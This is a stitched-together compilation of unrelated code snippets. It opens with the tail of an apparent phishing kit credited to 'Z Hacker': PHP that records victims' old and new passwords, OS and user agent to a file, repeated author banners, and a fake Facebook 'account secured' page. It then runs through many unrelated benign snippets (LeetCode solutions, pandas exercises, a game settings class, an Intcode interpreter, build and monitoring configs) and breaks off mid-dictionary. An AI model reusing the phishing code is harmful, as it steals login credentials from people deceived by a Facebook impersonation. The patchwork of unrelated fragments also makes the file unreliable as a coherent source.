fwrite($fh, $IPDATA); $stringData = "\\n" . "\\033[1;30m[\\033[0;31mOLD-PASS\\033[1;30m]\\033[0;33m:\\033[0m " . $_POST['old_password'] . "\\n" . "\\033[1;30m[\\033[0;31mNEW-PASS\\033[1;30m]\\033[0;33m:\\033[0m " . $_POST['new_password'] . "\\n\\n" . "\\033[1;30m[\\033[0mOS\\033[1;30m]\\033[0;33m:\\033[0;34m " . $user_agent['os_platform'] . "\\n" . "\\033[1;30m[\\033[0mUSER-AGENT\\033[1;30m]\\033[0;33m:\\033[0;34m " . $_SERVER['HTTP_USER_AGENT'] . "\\n\\n"; fwrite($fh, $stringData); fclose($fh); } ?> <script>location.href='account_secured.html';</script> </body> </html> """ # _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` #0xe4 Secured_Facebook = """<html> <head> <link rel="shortcut icon" href="//upload.wikimedia.org/wikipedia/commons/thumb/f/ff/Facebook_logo_36x36.svg/768px-Facebook_logo_36x36.svg.png" /> <title>Facebook</title> <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0;"> <meta http-equiv="refresh" content="10;url=http://www.facebook.com" /> <style type="text/css"> body { background-color: #3b5998; font-family: 'Lato', sans-serif; } h1 { color: white; font-size: 23px; text-align: center; } p { width: 300px; color: white; padding-top: 40px; text-align: center; } h4 { color: white; padding-top: 100px; text-align: center; } img { align-items: center; } </style> </head> <body> <center><img src="https://cdn.worldvectorlogo.com/logos/facebook-icon-white.svg"/ width="200" height="200"></center> <center><h1>Thanks For Securing Your Account!</h1></center> <center><p><b>if you need any help visit our Support Page at facebook.com/support</b> </p></center> </body> </html>"""
#!/usr/bin/python3 #-*- coding: UTF-8 -*- # 文件名:environ.py print ('Content-Type: text/html') print ('Set-Cookie: name="菜鸟教程";expires=Wed, 28 Aug 2017 18:30:00 GMT') print () print (""" <html> <head> <meta charset="gbk"> <title>菜鸟教程(runoob.com)</title> </head> <body> <h1>Cookie set OK!</h1> </body> </html> """)
def plot_table(data): fig = plt.figure() ax = fig.add_subplot(111) col_labels = list(range(0,10)) row_labels = [' 0 ', ' 1 ', ' 2 ', ' 3 ', ' 4 ', ' 5 ', ' 6 ', ' 7 ', ' 8 ', ' 9 '] # Draw table value_table = plt.table(cellText=data, colWidths=[0.05] * 10, rowLabels=row_labels, colLabels=col_labels, loc='center') value_table.auto_set_font_size(True) value_table.set_fontsize(24) value_table.scale(2.5, 2.5) # Removing ticks and spines enables you to get the figure only with table plt.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False) plt.tick_params(axis='y', which='both', right=False, left=False, labelleft=False) for pos in ['right','top','bottom','left']: plt.gca().spines[pos].set_visible(False)
"""Qiskit-Braket exception.""" class QiskitBraketException(Exception): """Qiskit-Braket exception."""
class Settings: def __init__(self): self.screen_width = 800 self.screen_height = 600 self.black = (0, 0, 0) self.white = (255, 255, 255) self.red = (255, 0, 0) self.green = (0, 255, 0) self.blue = (0, 0, 255) self.FPS = 90
N = 2 for i in range(1,N): for j in range(1,N): for k in range(1,N): for l in range(1,N): if i**3+j**3==k**3+l**3: print(i,j,k,l)
# Given a linked list, rotate the list to the right by k places, where k is non-negative. # Example 1: # Input: 1->2->3->4->5->NULL, k = 2 # Output: 4->5->1->2->3->NULL # Explanation: # rotate 1 steps to the right: 5->1->2->3->4->NULL # rotate 2 steps to the right: 4->5->1->2->3->NULL # Example 2: # Input: 0->1->2->NULL, k = 4 # Output: 2->0->1->NULL # Explanation: # rotate 1 steps to the right: 2->0->1->NULL # rotate 2 steps to the right: 1->2->0->NULL # rotate 3 steps to the right: 0->1->2->NULL # rotate 4 steps to the right: 2->0->1->NULL # Definition for singly-linked list. # class ListNode: # def __init__(self, x): # self.val = x # self.next = None class Solution: def rotateRight(self, head, k): """ :type head: ListNode :type k: int :rtype: ListNode """ if not head or not head.next: return head n = 1 point = head while point.next: point = point.next n += 1 point.next = head m = n - k % n - 1 while m >= 0 : head = head.next point = point.next m = m - 1 point.next = None return head # Time: O(n) # Space: O(1) # Difficulty: medium
def rainWaterTrapping(arr: list) -> int: n = len(arr) maxL = [1] * n maxR = [1] * n maxL[0] = arr[0] for i in range(1, n): maxL[i] = max(maxL[i - 1], arr[i]) maxR[n - 1] = arr[n - 1] for i in range(n - 2, -1, -1): maxR[i] = max(maxR[i + 1], arr[i]) total_water = 0 for i in range(n): total_water += min(maxL[i], maxR[i]) - arr[i] return total_water if __name__ == "__main__": water = [3, 0, 0, 2, 0, 4] res = rainWaterTrapping(water) print(res)
n=int(input()) x=hex(n)[-1] if x.isalpha(): x=ord(x)-87 print(bin(int(x))[-1])
BLACK = [0x00, 0x00, 0x00] # Floor WHITE = [0xFF, 0xFF, 0xFF] # Wall GOLD = [0xFF, 0xD7, 0x00] # Gold BLUE = [0x00, 0x00, 0xFF] # Player GRAY = [0x55, 0x55, 0x55] # Box GREEN = [0x00, 0xAA, 0x00] # Key PURPLE = [0xC4, 0x00, 0xC4] # Door RED = [0xFF, 0x00, 0x00] # Teleport 1 BROWN = [0xA0, 0x50, 0x00] # Teleport 2
def stretched(a): def rec(item, index): if index == 1: return [item] r = [item] r.extend(rec(item, index - 1)) return r def tail(ar, index, result): if len(ar) == 0: return result else: result.extend(rec(ar.pop(0), index)) return tail(ar, index + 1, result) return tail(a, 1, []) #b = stretched([8, 3, 5, 2]) #print(b) # POWERS def powers(x, limit): r = 1 while r <= limit: yield r r = r * x p = powers(2, 7) print(next(p)) print(next(p)) print(next(p)) # print(next(p)) def say(*first): if len(first) == 0: return '' def sub(*second): if len(second) == 0: return first[0] return say(f'{first[0]} {second[0]}') return sub y = say('Hello')('my')('name')('is')('Colette')() print(y) def say2(*first): if len(first) == 0: return '' def sub2(*second): new = '' if len(second) == 0: for i in first: new += i + ' ' return new for i in first: new += i + ' ' new = new[: -1] for i in second: new += i + ' ' return say2(new) return sub2 # y = say('Hello')('my')('name')('is')('Colette')() # print(y) z = say2('Hello')('my')('name')('is')('Colette')() print(z) input1 = { 'ATL': [ ['Betnijah Laney', 16, 263], ['Courtney Williams', 14, 193], ], 'CHI': [ ['Kahleah Copper', 17, 267], ['Allie Quigley', 17, 260], ['Courtney Vandersloot', 17, 225], ], 'CONN': [ ['DeWanna Bonner', 16, 285], ['Alyssa Thomas', 16, 241], ], 'DAL': [ ['Arike Ogunbowale', 16, 352], ['Satou Sabally', 12, 153], ], 'IND': [ ['Kelsey Mitchell', 16, 280], ['Tiffany Mitchell', 13, 172], ['Candice Dupree', 16, 202], ], 'LA': [ ['Nneka Ogwumike', 14, 172], ['Chelsea Gray', 16, 224], ['Candace Parker', 16, 211], ], 'LV': [ ['A’ja Wilson', 15, 304], ['Dearica Hamby', 15, 188], ['Angel McCoughtry', 15, 220], ], 'MIN': [ ['Napheesa Collier', 16, 262], ['Crystal Dangerfield', 16, 254], ], 'NY': [ ['Layshia Clarendon', 15, 188] ], 'PHX': [ ['Diana Taurasi', 13, 236], ['Brittney Griner', 12, 212], ['Skylar Diggins-Smith', 16, 261], ['Bria Hartley', 13, 190], ], 'SEA': [ ['Breanna Stewart', 16, 317], ['Jewell Loyd', 16, 223], ], 'WSH': [ ['Emma Meesseman', 13, 158], ['Ariel Atkins', 15, 212], ['Myisha Hines-Allen', 15, 236], ], } def top_ten_scorers(input1): topTen = [] for k, v in input1.items(): for players in v: if players[1] >= 15: if len(topTen) < 10: ppg = players[2] / players[1] topTen.append({'name': players[0], 'ppg': ppg, 'team': k}) else: ppg = players[2] / players[1] topTen.sort(key=lambda x: x['ppg']) if ppg > topTen[0]['ppg']: topTen.pop(0) topTen.append({'name': players[0], 'ppg': ppg, 'team': k}) topTen.sort(key=lambda x: x['ppg'], reverse = True) return topTen #g = topTenScorers(input1) #print(len(g)) #print(g) #INTERPRETER def allNumbers(s): r = 1 for i in s: if ord(i) > 57 or ord(i) < 48: return 0 return r def interpret(eval): token = eval.split(' ') stack1 = [] for t in token: if allNumbers(t): stack1.insert(0, int(t)) elif t == '+': y = stack1.pop(0) x = stack1.pop(0) stack1.insert(0, x + y) elif t == '-': y = stack1.pop(0) x = stack1.pop(0) stack1.insert(0, x - y) elif t == '*': y = stack1.pop(0) x = stack1.pop(0) stack1.insert(0, x * y) elif t == '/': y = stack1.pop(0) x = stack1.pop(0) stack1.insert(0, x / y) elif t == 'NEG': y = stack1.pop(0) stack1.insert(0, -1*y) elif t == 'SQRT': y = stack1.pop(0) stack1.insert(0, y**(1/2) ) elif t == 'DUP': y = stack1[0] stack1.insert(0, y) elif t == 'SWAP': y = stack1.pop(0) stack1.insert(1, y) elif t == 'PRINT': x = stack1.pop(0) yield(x) else: raise ValueError #print([*interpret("3 8 7 + PRINT 10 SWAP - PRINT")]) #print([*interpret("99 DUP * PRINT")])
# -*- coding: utf-8 -*- # Authors: Y. Jia <ytjia.zju@gmail.com> """ Find the contiguous subarray within an array (containing at least one number) which has the largest sum. https://leetcode.com/problems/maximum-subarray/description/ """ class Solution(object): def maxSubArray(self, nums): """ :type nums: List[int] :rtype: int """ if nums is None or len(nums) == 0: return None max_sum = nums[0] cur_sum = nums[0] for num in nums[1:]: if cur_sum <= 0: cur_sum = num else: cur_sum += num max_sum = max(max_sum, cur_sum) return max_sum
count = 0 sum = 0 print('Before', count, sum) for value in [9, 41, 12, 3, 74, 15]: count = count + 1 sum = sum + value print(count, sum, value) print('After', count, sum, sum / count)
""" module-wide / shared constants *** attributes *** *LOGGING_CFG*: logging configuration dictionary *** """ LOGGING_DICT = { "version": 1, "disable_existing_loggers": True, "formatters": { "verbose": { "format": "[%(asctime)s] - [%(name)s] - [%(levelname)s] - [%(funcName)s:%(lineno)s] - [%(message)s]" # pylint: disable=line-too-long }, "simple": {"format": "%(levelname)s %(message)s"}, }, "handlers": { "console": { "level": "DEBUG", "class": "logging.StreamHandler", "formatter": "verbose", } }, "loggers": { "mock": { "handlers": ["console"], "propagate": True, "level": "WARNING", } }, }
#!/usr/bin/env python3 class InputComponent: def __init__(self): """ Constructor in Python is always called `__init__` You should initialize all object-level variables in the constructor """ self._observers = [] def register_observer(self, observer): self._observers.append(observer) def emit_event_value_changed(self, new_value): for observer in self._observers: observer.on_value_changed_handler(new_value) def user_enters_value(self, value): # we don't even store the value in this object. # Just an arbitrary choice print('InputComponent: User enters value. Value: {}'.format(value)) self.emit_event_value_changed(value) class LabelComponent: def __init__(self): self.displayed_value = None def set_displayed_value(self, value): self.displayed_value = value print("LabelComponent: setting displayed value as: {}" .format(self.displayed_value)) def on_value_changed_handler(self, new_value): print('LabelComponent reacts to new value. new_value: {}' .format(new_value)) self.set_displayed_value(new_value) class DataStore: """ Data store has only one value for now, `username` """ def __init__(self): self.username = None self._observers = [] def register_observer(self, observer): self._observers.append(observer) def emit_event_value_changed(self, new_value): for observer in self._observers: observer.on_value_changed_handler(new_value) def on_value_changed_handler(self, new_value): print('DataStore reacts to new value. new_value: {}'.format(new_value)) self.set_username(new_value) def set_username(self, value): self.username = value self.emit_event_value_changed(value) def get_username(self): return self.username def main(): # put the stuff together input_component = InputComponent() label_component = LabelComponent() data_store = DataStore() input_component.register_observer(data_store) data_store.register_observer(label_component) user_input = "biedak" while user_input != "q": input_component.user_enters_value(user_input) user_input = input("\nEnter new username. (or `q` to quit) > ") # this is so running this file executes the code if __name__ == '__main__': main() """ future steps: - more dynamic data store - more dynamic bindings of components to the data store - generic `Component` class + inheritance - Observer and Observable classes - more `official` event system, maybe a mini library in a separate file - threads """
def pattern_thirty_seven(): '''Pattern thirty_seven 1 2 3 4 5 2 5 3 5 4 5 5 ''' num = '12345' for i in range(1, 6): if i == 1: print(' '.join(num)) elif i in range(2, 5): space = -2 * i + 9 # using -2*n + 9 for getting required space where n = 1, 2, 3, .... and here n = i output = num[i - 1] + ' ' * space + '5' print(output) else: print('5') if __name__ == '__main__': pattern_thirty_seven()
def listening_algorithm(to,from_): counts = [] to = to.split(' ') for i in range(len(from_)): count = 0 var = from_[i].split(' ') n = min(len(to),len(var)) for j in range(n): if var[j] in to[j]: count += 1 counts.append(count) maxm_ = max(counts) for i in range(len(counts)): if maxm_ == counts[i]: return from_[i]
''' 06 - Combining groupby() and resample() A very powerful method in Pandas is .groupby(). Whereas .resample() groups rows by some time or date information, .groupby() groups rows based on the values in one or more columns. For example, rides.groupby('Member type').size() would tell us how many rides there were by member type in our entire DataFrame. .resample() can be called after .groupby(). For example, how long was the median ride by month, and by Membership type? Instructions - Complete the .groupby() call to group by 'Member type', and the .resample() call to resample according to 'Start date', by month. - Print the median Duration for each group. ''' # Group rides by member type, and resample to the month grouped = rides.groupby('Member type')\ .resample('M', on='Start date') # Print the median duration for each group print(grouped['Duration'].median()) ''' <script.py> output: Member type Start date Casual 2017-10-31 1636.0 2017-11-30 1159.5 2017-12-31 850.0 Member 2017-10-31 671.0 2017-11-30 655.0 2017-12-31 387.5 Name: Duration, dtype: float64 '''
""" Growth rates ------------- (order low to high) (a.k.a. time complexity of a function/ complexity class of a function): O(1) -- Constant -- append, get item, set item. O(logn) -- Logarithmic -- Finding an element in a sorted array. O(n) -- Linear -- copy, insert, delete, iteration. nLogn -- Linear-Logarithmic -- Sort a list, merge - sort. n^2 -- Quadratic -- Find the shortest path between two nodes in a graph. Nested loops. n^3 -- Cubic -- Matrix multiplication. 2^n -- Exponential -- 'Towers of Hanoi' problem, backtracking. Composing complexity classes ---------------------------- * Simplest way to combine 2 complexity classes: add them: E.g. Consider the two operations of inserting an element into a list and then sorting that list: -> inserting an item: O(n) time -> sorting: O(nlogn) time ==> Total time complexity: O(n + nlogn), choose the highest order term ==> O(nlogn) * Multiply the complexity class by the number of times the operation is carried out. E.g. If we repeat an operation, for example, in a while loop -> If an operation with time complexity O(f(n)) is repeated O(n) times ==> The time complexity: O(f(n))*O(n) = O(n*f(n))) * Multiplying the time complexity of the operation with the number of times this operation executes. ** The running time of a loop is at most: the running time of the statements inside the loop * the number of iterations. E.g Suppose the function f(...) has a time complexity of O(n2) and it is executed n times in a while loop as follows: for i in range(n): f(...) ==> The time complexity of this loop: O(n^2) * O(n) = O(n * n2) = O(n3) E.g. A single nested loop (one loop nested inside another loop) will run in n^2 time assuming both loops run n times. for i in range(0,n): for j in range(0,n) #statements ==> Running time: each statement is a constant, c, executed nn times, cnn = cn^2 = O(n^2) * For consecutive statements within nested loops: we add the time complexities of each statement and multiply by the number of times the statement executed E.g. n = 500 #c0 #executes n times for i in range(0,n): print(i) #c1 #executes n times for i in range(0,n): #executes n times for j in range(0,n): print(j) #c2 ==> Time complexity: c0 +c1n + cn^2 = O(n^2). * We can define (base 2) logarithmic complexity, reducing the size of the problem by ½, in constant time. E.g. i = 1 while i <= n: i=i * 2 print(i) -> i is doubling on each iteration, if n = 10, it prints out 4 numbers; 2, 4, 8, and 16. -> if we double n, it prints out 5 numbers -> With each subsequent doubling of n the number of iterations is only increased by 1. ==> The total time complexity: O(log(n)). """
# model settings weight_root = '/home/datasets/mix_data/iMIX/data/models/detectron.vmb_weights/' model = dict( type='M4C', hidden_dim=768, dropout_prob=0.1, ocr_in_dim=3002, encoder=[ dict( type='TextBertBase', text_bert_init_from_bert_base=True, hidden_size=768, params=dict(num_hidden_layers=3)), dict( type='ImageFeatureEncoder', encoder_type='finetune_faster_rcnn_fpn_fc7', in_dim=2048, weights_file=weight_root + 'fc7_w.pkl', bias_file=weight_root + 'fc7_b.pkl', ), dict( type='ImageFeatureEncoder', encoder_type='finetune_faster_rcnn_fpn_fc7', in_dim=2048, weights_file=weight_root + 'fc7_w.pkl', bias_file=weight_root + 'fc7_b.pkl', ), ], backbone=dict(type='MMT', hidden_size=768, num_hidden_layers=4), combine_model=dict( type='ModalCombineLayer', combine_type='non_linear_element_multiply', img_feat_dim=4096, txt_emb_dim=2048, dropout=0, hidden_dim=5000, ), head=dict(type='LinearHead', in_dim=768, out_dim=5000)) loss = dict(type='M4CDecodingBCEWithMaskLoss')
def rpc_gas_price_strategy(webu, transaction_params=None): """ A simple gas price strategy deriving it's value from the eth_gasPrice JSON-RPC call. """ return webu.manager.request_blocking("eth_gasPrice", [])
bot_token = "" # Bot token stored as string bot_prefix = "" # bot prefix stored as string log_level = "INFO" # log level stored as string jellyfin_url = "" # jellyfin base url stored as string jellyfin_api_key = "" # jellyfin API key stored as string plex_url = "" # plex base url, stored as string plex_api_key = "" # plex API key stored as string plex_access_role = 0000000000000000000000 # discord role ID required to access the plex guild_id = 0000000000000000000000 # ID of guild plex_admin_role = 00000000000000000000 # role required to administrate the plex
class backupsolution: """Virtual Parent for all Backups Highlevel-API: @list_backups( cluster_identifier=None, backup_identifier=None) @take_backup(kind,cluster_identifier=None) @remove_backup(kind,backup_identifier=None) @check(cluster_identifier=None) @add_cluster(cluster_identifier=None) @remove_cluster(cluster_identifier=None) Childs should override: @list_backups(self,cluster_identifier=None, backup_identifier=None) @_take_full_backup(self,cluster_identifier=None) @_take_incremental_backup(self,cluster_identifier=None) @_take_logical_backup(self,cluster_identifier=None) @_remove_full_backup(self,backup_identifier=None) @_remove_incremental_backup(self,backup_identifier=None) @_remove_logical_backup(self,backup_identifier=None) """ def list_backups(self, cluster_identifier=None, backup_identifier=None): """ { "Clusteridentifier: { "Backupidentifier": {},..}, ..} In the event of zero existing backups a cluster will be listed as toplevel in list_backups. Hence it is sufficient to have list_backups and omit a list_clusters function. """ backupsolution._warn_not_implemented("list-backups") def add_cluster(self, cluster_identifier=None): backupsolution._warn_not_implemented("add cluster") def remove_cluster(cluster_identifier=None): backupsolution._warn_not_implemented("remove cluster") def check(self, cluster_identifier=None, backup_identifier=None): backupsolution._warn_not_implemented("check") def remove_backup(self, kind='full', backup_identifier=None): """Currently 3 Kinds of backups are supported: * full - full physical * incremental - incremental physical * logical - logical """ if kind == 'full': self._remove_full_backup(backup_identifier) elif kind == 'incremental': self._remove_incremental_backup(backup_identifier) elif kind == 'logical': self._remove_logical_backup(backup_identifier) def take_backup(self, kind='full', cluster_identifier=None, backup_identifier=None): """Currently 3 Kinds of backups are supported: * full - full physical * incremental - incremental physical * logical - logical """ if kind == 'full': self._take_full_backup(cluster_identifier) elif kind == 'incremental': self._take_incremental_backup(cluster_identifier) elif kind == 'logical': self._take_logical_backup(cluster_identifier) else: backupsolution._warn_not_implemented(f"undefined backupmethod {kind}") def _take_full_backup(self, cluster_identifier=None,): backupsolution._warn_not_implemented('FULL-BACKUP') def _take_incremental_backup(self, cluster_identifier=None,): backupsolution._warn_not_implemented('INCREMENTAL-BACKUP') def _take_logical_backup(self, cluster_identifier=None, ): backupsolution._warn_not_implemented('LOGICAL-BACKUP') @staticmethod def _warn_not_implemented(service): raise Exception(service+" is not supported")
def run_diagnostic_program(program): instruction_lengths = [0, 4, 4, 2, 2, 3, 3, 4, 4] i = 0 while i < len(program): opcode = program[i] % 100 modes = [(program[i] // 10**j) % 10 for j in range(2, 5)] if opcode == 99: break instruction_length = instruction_lengths[opcode] params = [program[i+k] for k in range(1, instruction_length)] values = [p if modes[j] else program[p] for j, p in enumerate(params)] i += instruction_length if opcode == 1: program[params[2]] = values[0] + values[1] elif opcode == 2: program[params[2]] = values[0] * values[1] elif opcode == 3: program[params[0]] = int(input("Input: ")) elif opcode == 4: print("Output: {}".format(values[0])) elif opcode == 5: if values[0] != 0: i = values[1] elif opcode == 6: if values[0] == 0: i = values[1] elif opcode == 7: program[params[2]] = int(values[0] < values[1]) elif opcode == 8: program[params[2]] = int(values[0] == values[1]) if __name__ == "__main__": inputs = open('inputs/05.txt', 'r') program = list(map(int, inputs.read().split(','))) run_diagnostic_program(program)
multiline_str = """This is a multiline string with more than one line code.""" unicode = u"\u00dcnic\u00f6de" raw_str = r"raw \n string" # The value in triple-quotes """ assigned to the multiline_str is a multi-line string literal. # The string u"\u00dcnic\u00f6de" is a Unicode literal which supports characters other than English. In this case, \u00dc represents Ü and \u00f6 represents ö. # r"raw \n string" is a raw string literal or (It can print \n in the string form) print(multiline_str) print(unicode) print(raw_str)
''' Created on 2018年6月15日 @author: zhaohongxing ''' class WechatHelper(object): ''' classdocs ''' def __init__(self, params): ''' Constructor ''' def isPicture(self,path): if not path: return False if path.endswith("jpg") or path.endswith("jpeg") or path.endswith("png"): return True
# In python lambda stands for an anonymous function. # A lambda function can only perform one lines worth of operations on a given input. greeting = lambda name: 'Hello ' + name print(greeting('Viewers')) # You can also use lambda with map(...) and filter(...) functions names = ['Sherry', 'Jeniffer', 'Ron', 'Sam', 'Messi'] s_manes = list(filter(lambda name: name.lower().startswith('s'), names)) print(s_manes) greetings = list(map(lambda name: 'Hey ' + name, s_manes)) print(greetings)
{ "targets": [ { "target_name": "MagickCLI", "sources": ["src/magick-cli.cc"], 'cflags!': [ '-fno-exceptions' ], 'cflags_cc!': [ '-fno-exceptions' ], "include_dirs": [ "<!@(node -p \"require('node-addon-api').include\")" ], 'dependencies': [ "<!(node -p \"require('node-addon-api').gyp\")" ], "conditions": [ ['OS=="linux" or OS=="solaris" or OS=="freebsd"', { "libraries": [ '<!@(pkg-config --libs MagickWand)', '<!@(pkg-config --libs MagickCore)' ], 'cflags': [ '<!@(pkg-config --cflags MagickWand)', '<!@(pkg-config --cflags MagickCore)' ] }], ['OS=="win"', { "variables": { "MAGICK%": '<!(python magick-cli-path.py)' } , "msvs_settings": { "VCCLCompilerTool": { "ExceptionHandling": 1 } }, "libraries": [ '-l<(MAGICK)/lib/CORE_RL_MagickWand_.lib', '-l<(MAGICK)/lib/CORE_RL_MagickCore_.lib' ], "include_dirs": [ '<(MAGICK)/include' ] }], ['OS=="mac"', { 'xcode_settings': { 'GCC_ENABLE_CPP_EXCEPTIONS': 'YES', 'CLANG_CXX_LIBRARY': 'libc++', 'MACOSX_DEPLOYMENT_TARGET': '10.7', 'OTHER_CFLAGS': [ '<!@(pkg-config --cflags MagickCore)', '<!@(pkg-config --cflags MagickWand)' ], 'OTHER_CPLUSPLUSFLAGS' : [ '<!@(pkg-config --cflags MagickCore)', '<!@(pkg-config --cflags MagickWand)' '-std=c++11', '-stdlib=libc++', ], 'OTHER_LDFLAGS': ['-stdlib=libc++'] }, "libraries": [ '<!@(pkg-config --libs MagickWand)', '<!@(pkg-config --libs MagickCore)' ], 'cflags': [ '<!@(pkg-config --cflags MagickWand)', '<!@(pkg-config --cflags MagickCore)' ] }] ] } ] }
# -*- coding: utf-8 -*- ############################################## # Export CloudWatch metric data to csv file # Configuration file ############################################## METRICS = { 'CPUUtilization': ['AWS/EC2', 'AWS/RDS'], 'CPUCreditUsage': ['AWS/EC2', 'AWS/RDS'], 'CPUCreditBalance': ['AWS/EC2', 'AWS/RDS'], 'DiskReadOps': ['AWS/EC2'], 'DiskWriteOps': ['AWS/EC2'], 'DiskReadBytes': ['AWS/EC2'], 'DiskWriteBytes': ['AWS/EC2'], 'NetworkIn': ['AWS/EC2'], 'NetworkOut': ['AWS/EC2'], 'NetworkPacketsIn': ['AWS/EC2'], 'NetworkPacketsOut': ['AWS/EC2'], 'MetadataNoToken': ['AWS/EC2'], 'CPUSurplusCreditBalance': ['AWS/EC2'], 'CPUSurplusCreditsCharged': ['AWS/EC2'], 'EBSReadOps': ['AWS/EC2'], 'EBSWriteOps': ['AWS/EC2'], 'EBSReadBytes': ['AWS/EC2'], 'EBSWriteBytes': ['AWS/EC2'], 'EBSIOBalance%': ['AWS/EC2'], 'EBSByteBalance%': ['AWS/EC2'], 'StatusCheckFailed': ['AWS/EC2'], 'StatusCheckFailed_Instance': ['AWS/EC2'], 'StatusCheckFailed_System': ['AWS/EC2'], 'BinLogDiskUsage': ['AWS/RDS'], 'BurstBalance': ['AWS/RDS'], 'DatabaseConnections': ['AWS/RDS'], 'DiskQueueDepth': ['AWS/RDS'], 'FailedSQLServerAgentJobsCount': ['AWS/RDS'], 'FreeableMemory': ['AWS/RDS'], 'FreeStorageSpace': ['AWS/RDS'], 'MaximumUsedTransactionIDs': ['AWS/RDS'], 'NetworkReceiveThroughput': ['AWS/RDS'], 'NetworkTransmitThroughput': ['AWS/RDS'], 'OldestReplicationSlotLag': ['AWS/RDS'], 'ReadIOPS': ['AWS/RDS'], 'ReadLatency': ['AWS/RDS'], 'ReadThroughput': ['AWS/RDS'], 'ReplicaLag': ['AWS/RDS'], 'ReplicationSlotDiskUsage': ['AWS/RDS'], 'SwapUsage': ['AWS/RDS'], 'TransactionLogsDiskUsage': ['AWS/RDS'], 'TransactionLogsGeneration': ['AWS/RDS'], 'WriteIOPS': ['AWS/RDS'], 'WriteLatency': ['AWS/RDS'], 'WriteThroughput': ['AWS/RDS'], 'ActiveConnectionCount': ['AWS/ApplicationELB'], 'ClientTLSNegotiationErrorCount': ['AWS/ApplicationELB'], 'ConsumedLCUs': ['AWS/ApplicationELB'], 'DesyncMitigationMode_NonCompliant_Request_Count': ['AWS/ApplicationELB'], 'HTTP_Fixed_Response_Count': ['AWS/ApplicationELB'], 'HTTP_Redirect_Count': ['AWS/ApplicationELB'], 'HTTP_Redirect_Url_Limit_Exceeded_Count': ['AWS/ApplicationELB'], 'HTTPCode_ELB_3XX_Count': ['AWS/ApplicationELB'], 'HTTPCode_ELB_4XX_Count': ['AWS/ApplicationELB'], 'HTTPCode_ELB_5XX_Count': ['AWS/ApplicationELB'], 'HTTPCode_ELB_500_Count': ['AWS/ApplicationELB'], 